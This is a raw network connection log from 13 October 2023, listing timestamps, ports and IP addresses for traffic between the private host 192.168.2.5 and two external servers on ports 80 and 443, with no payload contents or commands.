Oct 13, 2023 15:20:56.909921885 CEST	443	49723	172.67.139.220	192.168.2.5
Oct 13, 2023 15:20:56.910043001 CEST	443	49723	172.67.139.220	192.168.2.5
Oct 13, 2023 15:20:56.910104990 CEST	49723	443	192.168.2.5	172.67.139.220
Oct 13, 2023 15:20:56.910104990 CEST	49723	443	192.168.2.5	172.67.139.220
Oct 13, 2023 15:20:56.911588907 CEST	49723	443	192.168.2.5	172.67.139.220
Oct 13, 2023 15:20:56.911629915 CEST	443	49723	172.67.139.220	192.168.2.5
Oct 13, 2023 15:20:57.212721109 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.212748051 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.212814093 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.212814093 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.212847948 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.212898970 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.212923050 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.212973118 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.212980986 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.213017941 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.213098049 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.213099003 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.213146925 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.213182926 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.213211060 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.213243961 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.213280916 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.213316917 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.213326931 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.213368893 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.213413954 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.213449955 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.213457108 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.213495016 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.213517904 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.213555098 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.213637114 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.213651896 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.213700056 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.213735104 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.213773012 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.213778019 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.213830948 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.213871002 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.213917971 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.213938951 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.213974953 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.213982105 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.214021921 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.214102030 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.214137077 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.214147091 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.214178085 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.214241982 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.214277983 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.214288950 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.214319944 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.214345932 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.214391947 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.214473963 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.214509010 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.214524031 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.214545965 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.214557886 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.214586973 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.214613914 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.214658976 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.214711905 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.214757919 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.214778900 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.214824915 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.214875937 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.214925051 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.214967012 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.215017080 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.215060949 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.215114117 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.215130091 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.215166092 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.215178013 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.215210915 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.215265036 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.215308905 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.215331078 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.215378046 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.215413094 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.215456009 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.215481997 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.215528011 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.215585947 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.215637922 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.215734005 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.215785027 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.216186047 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.216232061 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.216460943 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.216521025 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.216547012 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.216584921 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.216598034 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.216629982 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.216653109 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.216687918 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.216700077 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.216725111 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.216808081 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.216840982 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.216877937 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.216892958 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.216917038 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.216945887 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.216981888 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.216994047 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.217031956 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.217082024 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.217120886 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.217128038 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.217168093 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.217186928 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.217222929 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.217236996 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.217267036 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.217291117 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.217327118 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.217339039 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.217370033 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.217394114 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.217441082 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.217462063 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.217505932 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.217526913 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.217575073 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.217622042 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.217657089 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.217669010 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.217696905 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.217725992 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.217772961 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.217852116 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.217899084 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.217919111 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.217955112 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.217968941 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.217999935 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.218023062 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.218059063 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.218070030 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.218095064 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.218107939 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.218136072 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.218163013 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.218209982 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.218260050 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.218296051 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.218312979 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.218336105 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.218363047 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.218398094 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.218410015 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.218482018 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.218483925 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.218522072 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.218533993 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.218573093 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.218619108 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.218683958 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.218713999 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.218756914 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.218781948 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.218857050 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.218878031 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.218945980 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.218976021 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.219024897 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.219101906 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.219149113 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.219167948 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.219213963 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.219265938 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.219302893 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.219310999 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.219351053 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.219400883 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.219440937 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.219469070 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.219511986 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.219556093 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.219598055 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.219624996 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.219666004 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.219696999 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.219737053 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.219795942 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.219836950 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.219877958 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.219913960 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.219918966 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.219953060 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.219983101 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.220025063 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.220079899 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.220120907 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.220146894 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.220189095 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.220221996 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.220263004 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.220288992 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.220330000 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.220356941 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.220392942 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.220397949 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.220428944 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.220459938 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.220499992 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.220525980 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.220566034 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.220592976 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.220633030 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.220659971 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.220700026 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.220731020 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.220772028 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.220779896 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.220815897 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.220824957 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.220861912 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.220907927 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.220946074 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.220978022 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.221014023 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.221045017 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.221085072 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.221112967 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.221151114 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.221182108 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.221218109 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.221241951 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.221283913 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.221314907 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.221333027 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.221354961 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.221373081 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.221399069 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.221437931 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.221515894 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.221554041 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.221584082 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.221618891 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.221662045 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.221698046 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.221740961 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.221776962 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.221802950 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.221821070 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.221839905 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.221865892 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.221903086 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.221940041 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.221982956 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.222018003 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.222141027 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.222178936 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.222222090 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.222259998 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.222278118 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.222313881 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.222398996 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.222450018 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.222533941 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.222569942 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.222577095 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.222614050 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.222630024 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.222666979 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.222697973 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.222733974 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.222759008 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.222795963 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.222830057 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.222868919 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.222899914 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.222937107 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.222980976 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.223016977 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.223084927 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.223118067 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.223161936 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.223197937 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.223265886 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.223303080 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.223334074 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.223373890 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.223412037 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.223428965 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.223448992 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.223465919 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.223480940 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.223517895 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.223562002 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.223598003 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.223620892 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.223656893 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.223660946 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.223695993 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.223722935 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.223752975 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.223761082 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.223788977 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.223838091 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.223874092 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.223902941 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.223937988 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.223958969 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.223995924 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.224039078 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.224078894 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.224111080 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.224147081 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.224220037 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.224292994 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.224309921 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.224334955 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.224353075 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.224370956 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.224385977 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.224423885 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.224466085 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.224503040 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.224514008 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.224550009 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.224550962 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.224590063 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.224600077 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.224636078 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.224678040 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.224721909 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.224724054 CEST	49721	80	192.168.2.5	91.215.85.17
